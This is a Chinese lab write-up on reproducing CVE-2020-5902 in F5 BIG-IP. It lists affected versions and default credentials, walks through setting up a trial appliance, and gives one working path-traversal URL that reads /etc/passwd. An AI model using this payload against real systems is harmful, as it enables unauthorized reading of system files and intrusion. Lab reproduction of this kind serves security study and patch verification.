F5 BIG-IP远程代码执行漏洞复现(CVE-2020-5902)

前言

F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。

影响版本

BIG-IP 15.x: 15.1.0/15.0.0

BIG-IP 14.x: 14.1.0 ~ 14.1.2

BIG-IP 13.x: 13.1.0 ~ 13.1.3

BIG-IP 12.x: 12.1.0 ~ 12.1.5

BIG-IP 11.x: 11.6.1 ~ 11.6.5

环境搭建

在下面页面登录注册,之后申请秘钥

https://www.f5.com.cn/trials/big-ip-virtual-edition

https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v11.x&ver=11.6.4

F5 BIG-IP远程代码执行漏洞复现(CVE-2020-5902)_第1张图片

选择存在漏洞的版本

F5 BIG-IP远程代码执行漏洞复现(CVE-2020-5902)_第2张图片

F5 BIG-IP远程代码执行漏洞复现(CVE-2020-5902)_第3张图片

F5 BIG-IP远程代码执行漏洞复现(CVE-2020-5902)_第4张图片

下载完成后在虚拟机-文件-打开

F5 BIG-IP远程代码执行漏洞复现(CVE-2020-5902)_第5张图片

其他全都默认设置
账号,密码

root

default

F5 BIG-IP远程代码执行漏洞复现(CVE-2020-5902)_第6张图片

配置ip地址

config

F5 BIG-IP远程代码执行漏洞复现(CVE-2020-5902)_第7张图片

F5 BIG-IP远程代码执行漏洞复现(CVE-2020-5902)_第8张图片

默认即可

访问管理页面

https://192.168.2.112/

F5 BIG-IP远程代码执行漏洞复现(CVE-2020-5902)_第9张图片

账号,密码

admin admin

F5 BIG-IP远程代码执行漏洞复现(CVE-2020-5902)_第10张图片

点击next输入证书激活

这个邮件会发送到注册的邮箱

F5 BIG-IP远程代码执行漏洞复现(CVE-2020-5902)_第11张图片

F5 BIG-IP远程代码执行漏洞复现(CVE-2020-5902)_第12张图片

将生成的license粘贴到下面的网页去激活

将获得的license粘贴回第三部

F5 BIG-IP远程代码执行漏洞复现(CVE-2020-5902)_第13张图片

F5 BIG-IP远程代码执行漏洞复现(CVE-2020-5902)_第14张图片

F5 BIG-IP远程代码执行漏洞复现(CVE-2020-5902)_第15张图片

重新登录
激活成功

漏洞复现

https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

F5 BIG-IP远程代码执行漏洞复现(CVE-2020-5902)_第16张图片

修复建议

升级到最新版

你可能感兴趣的:(安全)